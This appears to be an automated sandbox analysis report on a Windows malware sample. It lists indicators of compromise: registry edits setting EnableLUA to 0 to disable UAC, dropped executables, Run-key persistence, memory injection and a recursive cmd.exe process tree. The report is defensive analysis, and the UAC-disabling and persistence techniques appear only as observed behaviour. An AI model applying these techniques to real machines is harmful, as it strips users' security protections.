Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	cmd.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	9951030ee369c5exeexeexeex.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	cmd.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	9951030ee369c5exeexeexeex.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	9951030ee369c5exeexeexeex.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	cscript.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	cmd.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	Process not Found
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	9951030ee369c5exeexeexeex.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	Process not Found
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	cmd.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	9951030ee369c5exeexeexeex.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	cmd.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	9951030ee369c5exeexeexeex.exe

Drops file in System32 directory 2 IoCs

description	ioc	Process
File opened for modification	C:\Windows\SysWOW64\shell32.dll.exe	PgYEoUks.exe
File created	C:\Windows\SysWOW64\shell32.dll.exe	PgYEoUks.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Modifies registry key 1 TTPs 64 IoCs

Modify Registry

T1112

pid	Process
4828	reg.exe
4228	Process not Found
4252	reg.exe
1240	reg.exe
2188	reg.exe
644	reg.exe
1904	reg.exe
4748	reg.exe
2592	reg.exe
4000	reg.exe
1492	reg.exe
4580	reg.exe
3580	reg.exe
1476	reg.exe
4028	reg.exe
4188	reg.exe
368	reg.exe
4076	reg.exe
3752	reg.exe
1136	reg.exe
3756	reg.exe
928	reg.exe
2564	reg.exe
4952	reg.exe
4848	reg.exe
2936	reg.exe
1428	reg.exe
568	reg.exe
4992	reg.exe
4028	reg.exe
1668	reg.exe
3524	reg.exe
3988	reg.exe
4188	reg.exe
1212	reg.exe
4980	reg.exe
2712	reg.exe
1460	reg.exe
4272	reg.exe
2736	reg.exe
4580	reg.exe
640	reg.exe
1492	reg.exe
2704	reg.exe
3596	reg.exe
4776	reg.exe
2876	reg.exe
1360	reg.exe
696	reg.exe
3168	reg.exe
1044	reg.exe
1732	reg.exe
4896	reg.exe
4860	reg.exe
1532	reg.exe
4228	reg.exe
4812	Process not Found
3740	reg.exe
2552	reg.exe
3576	reg.exe
1120	reg.exe
2864	reg.exe
5028	reg.exe
2596	reg.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
3288	9951030ee369c5exeexeexeex.exe
3288	9951030ee369c5exeexeexeex.exe
3288	9951030ee369c5exeexeexeex.exe
3288	9951030ee369c5exeexeexeex.exe
3336	9951030ee369c5exeexeexeex.exe
3336	9951030ee369c5exeexeexeex.exe
3336	9951030ee369c5exeexeexeex.exe
3336	9951030ee369c5exeexeexeex.exe
1920	9951030ee369c5exeexeexeex.exe
1920	9951030ee369c5exeexeexeex.exe
1920	9951030ee369c5exeexeexeex.exe
1920	9951030ee369c5exeexeexeex.exe
4440	9951030ee369c5exeexeexeex.exe
4440	9951030ee369c5exeexeexeex.exe
4440	9951030ee369c5exeexeexeex.exe
4440	9951030ee369c5exeexeexeex.exe
3124	reg.exe
3124	reg.exe
3124	reg.exe
3124	reg.exe
4616	9951030ee369c5exeexeexeex.exe
4616	9951030ee369c5exeexeexeex.exe
4616	9951030ee369c5exeexeexeex.exe
4616	9951030ee369c5exeexeexeex.exe
928	cmd.exe
928	cmd.exe
928	cmd.exe
928	cmd.exe
4988	Conhost.exe
4988	Conhost.exe
4988	Conhost.exe
4988	Conhost.exe
2084	9951030ee369c5exeexeexeex.exe
2084	9951030ee369c5exeexeexeex.exe
2084	9951030ee369c5exeexeexeex.exe
2084	9951030ee369c5exeexeexeex.exe
4260	9951030ee369c5exeexeexeex.exe
4260	9951030ee369c5exeexeexeex.exe
4260	9951030ee369c5exeexeexeex.exe
4260	9951030ee369c5exeexeexeex.exe
4820	9951030ee369c5exeexeexeex.exe
4820	9951030ee369c5exeexeexeex.exe
4820	9951030ee369c5exeexeexeex.exe
4820	9951030ee369c5exeexeexeex.exe
4680	Conhost.exe
4680	Conhost.exe
4680	Conhost.exe
4680	Conhost.exe
2100	9951030ee369c5exeexeexeex.exe
2100	9951030ee369c5exeexeexeex.exe
2100	9951030ee369c5exeexeexeex.exe
2100	9951030ee369c5exeexeexeex.exe
2148	9951030ee369c5exeexeexeex.exe
2148	9951030ee369c5exeexeexeex.exe
2148	9951030ee369c5exeexeexeex.exe
2148	9951030ee369c5exeexeexeex.exe
2528	9951030ee369c5exeexeexeex.exe
2528	9951030ee369c5exeexeexeex.exe
2528	9951030ee369c5exeexeexeex.exe
2528	9951030ee369c5exeexeexeex.exe
4100	9951030ee369c5exeexeexeex.exe
4100	9951030ee369c5exeexeexeex.exe
4100	9951030ee369c5exeexeexeex.exe
4100	9951030ee369c5exeexeexeex.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
2744	PgYEoUks.exe

Suspicious use of FindShellTrayWindow 64 IoCs

pid	Process
2744	PgYEoUks.exe
2744	PgYEoUks.exe
2744	PgYEoUks.exe
2744	PgYEoUks.exe
2744	PgYEoUks.exe
2744	PgYEoUks.exe
2744	PgYEoUks.exe
2744	PgYEoUks.exe
2744	PgYEoUks.exe
2744	PgYEoUks.exe
2744	PgYEoUks.exe
2744	PgYEoUks.exe
2744	PgYEoUks.exe
2744	PgYEoUks.exe
2744	PgYEoUks.exe
2744	PgYEoUks.exe
2744	PgYEoUks.exe
2744	PgYEoUks.exe
2744	PgYEoUks.exe
2744	PgYEoUks.exe
2744	PgYEoUks.exe
2744	PgYEoUks.exe
2744	PgYEoUks.exe
2744	PgYEoUks.exe
2744	PgYEoUks.exe
2744	PgYEoUks.exe
2744	PgYEoUks.exe
2744	PgYEoUks.exe
2744	PgYEoUks.exe
2744	PgYEoUks.exe
2744	PgYEoUks.exe
2744	PgYEoUks.exe
2744	PgYEoUks.exe
2744	PgYEoUks.exe
2744	PgYEoUks.exe
2744	PgYEoUks.exe
2744	PgYEoUks.exe
2744	PgYEoUks.exe
2744	PgYEoUks.exe
2744	PgYEoUks.exe
2744	PgYEoUks.exe
2744	PgYEoUks.exe
2744	PgYEoUks.exe
2744	PgYEoUks.exe
2744	PgYEoUks.exe
2744	PgYEoUks.exe
2744	PgYEoUks.exe
2744	PgYEoUks.exe
2744	PgYEoUks.exe
2744	PgYEoUks.exe
2744	PgYEoUks.exe
2744	PgYEoUks.exe
2744	PgYEoUks.exe
2744	PgYEoUks.exe
2744	PgYEoUks.exe
2744	PgYEoUks.exe
2744	PgYEoUks.exe
2744	PgYEoUks.exe
2744	PgYEoUks.exe
2744	PgYEoUks.exe
2744	PgYEoUks.exe
2744	PgYEoUks.exe
2744	PgYEoUks.exe
2744	PgYEoUks.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3288 wrote to memory of 3296	3288	9951030ee369c5exeexeexeex.exe	85
PID 3288 wrote to memory of 3296	3288	9951030ee369c5exeexeexeex.exe	85
PID 3288 wrote to memory of 3296	3288	9951030ee369c5exeexeexeex.exe	85
PID 3288 wrote to memory of 2744	3288	9951030ee369c5exeexeexeex.exe	86
PID 3288 wrote to memory of 2744	3288	9951030ee369c5exeexeexeex.exe	86
PID 3288 wrote to memory of 2744	3288	9951030ee369c5exeexeexeex.exe	86
PID 3288 wrote to memory of 952	3288	9951030ee369c5exeexeexeex.exe	87
PID 3288 wrote to memory of 952	3288	9951030ee369c5exeexeexeex.exe	87
PID 3288 wrote to memory of 952	3288	9951030ee369c5exeexeexeex.exe	87
PID 3288 wrote to memory of 4260	3288	9951030ee369c5exeexeexeex.exe	89
PID 3288 wrote to memory of 4260	3288	9951030ee369c5exeexeexeex.exe	89
PID 3288 wrote to memory of 4260	3288	9951030ee369c5exeexeexeex.exe	89
PID 3288 wrote to memory of 1136	3288	9951030ee369c5exeexeexeex.exe	93
PID 3288 wrote to memory of 1136	3288	9951030ee369c5exeexeexeex.exe	93
PID 3288 wrote to memory of 1136	3288	9951030ee369c5exeexeexeex.exe	93
PID 3288 wrote to memory of 4476	3288	9951030ee369c5exeexeexeex.exe	92
PID 3288 wrote to memory of 4476	3288	9951030ee369c5exeexeexeex.exe	92
PID 3288 wrote to memory of 4476	3288	9951030ee369c5exeexeexeex.exe	92
PID 3288 wrote to memory of 1564	3288	9951030ee369c5exeexeexeex.exe	90
PID 3288 wrote to memory of 1564	3288	9951030ee369c5exeexeexeex.exe	90
PID 3288 wrote to memory of 1564	3288	9951030ee369c5exeexeexeex.exe	90
PID 952 wrote to memory of 3336	952	cmd.exe	97
PID 952 wrote to memory of 3336	952	cmd.exe	97
PID 952 wrote to memory of 3336	952	cmd.exe	97
PID 1564 wrote to memory of 1716	1564	cmd.exe	98
PID 1564 wrote to memory of 1716	1564	cmd.exe	98
PID 1564 wrote to memory of 1716	1564	cmd.exe	98
PID 3336 wrote to memory of 5024	3336	9951030ee369c5exeexeexeex.exe	99
PID 3336 wrote to memory of 5024	3336	9951030ee369c5exeexeexeex.exe	99
PID 3336 wrote to memory of 5024	3336	9951030ee369c5exeexeexeex.exe	99
PID 5024 wrote to memory of 1920	5024	cmd.exe	101
PID 5024 wrote to memory of 1920	5024	cmd.exe	101
PID 5024 wrote to memory of 1920	5024	cmd.exe	101
PID 3336 wrote to memory of 1904	3336	9951030ee369c5exeexeexeex.exe	109
PID 3336 wrote to memory of 1904	3336	9951030ee369c5exeexeexeex.exe	109
PID 3336 wrote to memory of 1904	3336	9951030ee369c5exeexeexeex.exe	109
PID 3336 wrote to memory of 2492	3336	9951030ee369c5exeexeexeex.exe	108
PID 3336 wrote to memory of 2492	3336	9951030ee369c5exeexeexeex.exe	108
PID 3336 wrote to memory of 2492	3336	9951030ee369c5exeexeexeex.exe	108
PID 3336 wrote to memory of 3636	3336	9951030ee369c5exeexeexeex.exe	107
PID 3336 wrote to memory of 3636	3336	9951030ee369c5exeexeexeex.exe	107
PID 3336 wrote to memory of 3636	3336	9951030ee369c5exeexeexeex.exe	107
PID 3336 wrote to memory of 3896	3336	9951030ee369c5exeexeexeex.exe	102
PID 3336 wrote to memory of 3896	3336	9951030ee369c5exeexeexeex.exe	102
PID 3336 wrote to memory of 3896	3336	9951030ee369c5exeexeexeex.exe	102
PID 3896 wrote to memory of 4708	3896	cmd.exe	110
PID 3896 wrote to memory of 4708	3896	cmd.exe	110
PID 3896 wrote to memory of 4708	3896	cmd.exe	110
PID 1920 wrote to memory of 1652	1920	9951030ee369c5exeexeexeex.exe	111
PID 1920 wrote to memory of 1652	1920	9951030ee369c5exeexeexeex.exe	111
PID 1920 wrote to memory of 1652	1920	9951030ee369c5exeexeexeex.exe	111
PID 1920 wrote to memory of 2556	1920	9951030ee369c5exeexeexeex.exe	119
PID 1920 wrote to memory of 2556	1920	9951030ee369c5exeexeexeex.exe	119
PID 1920 wrote to memory of 2556	1920	9951030ee369c5exeexeexeex.exe	119
PID 1920 wrote to memory of 2552	1920	9951030ee369c5exeexeexeex.exe	118
PID 1920 wrote to memory of 2552	1920	9951030ee369c5exeexeexeex.exe	118
PID 1920 wrote to memory of 2552	1920	9951030ee369c5exeexeexeex.exe	118
PID 1920 wrote to memory of 456	1920	9951030ee369c5exeexeexeex.exe	117
PID 1920 wrote to memory of 456	1920	9951030ee369c5exeexeexeex.exe	117
PID 1920 wrote to memory of 456	1920	9951030ee369c5exeexeexeex.exe	117
PID 1920 wrote to memory of 4296	1920	9951030ee369c5exeexeexeex.exe	116
PID 1920 wrote to memory of 4296	1920	9951030ee369c5exeexeexeex.exe	116
PID 1920 wrote to memory of 4296	1920	9951030ee369c5exeexeexeex.exe	116
PID 1652 wrote to memory of 4440	1652	cmd.exe	121

System policy modification 1 TTPs 50 IoCs

evasion

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	Process not Found
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System	Process not Found
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	cmd.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System	cmd.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	cmd.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	9951030ee369c5exeexeexeex.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System	cscript.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System	cmd.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System	Process not Found
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	Process not Found
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	Process not Found
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	cmd.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System	cmd.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System	9951030ee369c5exeexeexeex.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System	cmd.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	cmd.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System	Process not Found
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System	Process not Found
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System	cmd.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	Process not Found
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	Process not Found
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	9951030ee369c5exeexeexeex.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System	cscript.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	cscript.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	cscript.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System	9951030ee369c5exeexeexeex.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System	Process not Found
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	cmd.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System	cmd.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	cscript.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	9951030ee369c5exeexeexeex.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System	Process not Found
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	Process not Found
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System	9951030ee369c5exeexeexeex.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System	cmd.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	cmd.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	cmd.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	cmd.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System	cmd.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	Process not Found
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	9951030ee369c5exeexeexeex.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	cmd.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	9951030ee369c5exeexeexeex.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System	Process not Found
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	9951030ee369c5exeexeexeex.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System	9951030ee369c5exeexeexeex.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System	cscript.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System	cmd.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System	9951030ee369c5exeexeexeex.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System	9951030ee369c5exeexeexeex.exe

C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex.exe
"C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex.exe"
1⤵
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3288
- C:\Users\Admin\LGsEMEok\fWgsIgEU.exe
  "C:\Users\Admin\LGsEMEok\fWgsIgEU.exe"
  2⤵
  - Executes dropped EXE
  - Adds Run key to start application
  PID:3296
- C:\ProgramData\DeMIIMAc\PgYEoUks.exe
  "C:\ProgramData\DeMIIMAc\PgYEoUks.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Adds Run key to start application
  - Drops file in System32 directory
  - Suspicious behavior: GetForegroundWindowSpam
  - Suspicious use of FindShellTrayWindow
  PID:2744
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:952
- - C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex.exe
    C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of WriteProcessMemory
    PID:3336
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:5024
    - - C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex.exe
        
        C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex
        5⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of WriteProcessMemory
        
        PID:1920
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex"
        6⤵
        Suspicious use of WriteProcessMemory
        
        PID:1652
        
        C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex.exe
        
        C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex
        7⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:4440
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex"
        8⤵
        
        PID:3920
        
        C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex.exe
        
        C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex
        9⤵
        
        PID:3124
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex"
        10⤵
        
        PID:1424
        
        C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex.exe
        
        C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex
        11⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:4616
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex"
        12⤵
        
        PID:1140
        
        C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex.exe
        
        C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex
        13⤵
        
        PID:928
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex"
        14⤵
        
        PID:4708
        
        C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex.exe
        
        C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex
        15⤵
        
        PID:4988
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex"
        16⤵
        
        PID:684
        
        C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex.exe
        
        C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex
        17⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:2084
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex"
        18⤵
        
        PID:1612
        
        C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex.exe
        
        C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex
        19⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:4260
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex"
        20⤵
        
        PID:4076
        
        C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex.exe
        
        C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex
        21⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:4820
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex"
        22⤵
        
        PID:396
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        23⤵
        
        PID:952
        
        C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex.exe
        
        C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex
        23⤵
        
        PID:4680
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex"
        24⤵
        
        PID:3676
        
        C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex.exe
        
        C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex
        25⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:2100
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex"
        26⤵
        
        PID:3968
        
        C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex.exe
        
        C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex
        27⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:2148
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex"
        28⤵
        
        PID:2504
        
        C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex.exe
        
        C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex
        29⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:2528
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex"
        30⤵
        
        PID:1124
        
        C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex.exe
        
        C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex
        31⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:4100
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex"
        32⤵
        
        PID:4296
        
        C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex.exe
        
        C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex
        33⤵
        
        PID:1732
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex"
        34⤵
        
        PID:2360
        
        C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex.exe
        
        C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex
        35⤵
        
        PID:3720
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex"
        36⤵
        
        PID:772
        
        C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex.exe
        
        C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex
        37⤵
        
        PID:1428
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex"
        38⤵
        
        PID:4516
        
        C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex.exe
        
        C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex
        39⤵
        
        PID:4480
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex"
        40⤵
        
        PID:1912
        
        C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex.exe
        
        C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex
        41⤵
        
        PID:3464
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex"
        42⤵
        
        PID:736
        
        C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex.exe
        
        C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex
        43⤵
        
        PID:4500
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex"
        44⤵
        
        PID:856
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        45⤵
        UAC bypass
        
        PID:5032
        
